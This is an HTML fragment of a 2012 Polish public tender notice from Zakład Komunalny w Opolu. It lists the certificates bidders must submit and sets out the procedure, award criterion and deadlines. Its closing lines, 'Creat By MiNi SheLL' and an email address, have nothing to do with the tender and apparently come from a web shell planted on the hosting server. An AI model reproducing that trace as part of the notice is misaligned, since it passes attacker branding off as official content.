<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakład-komunalny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zakład-komunalny.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2012 godzina 10:30, miejsce: Zakład Komunalny w Opolu Sp. z o. o.
ul. Podmiejska 69
45-574 Opole
I piętro - pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com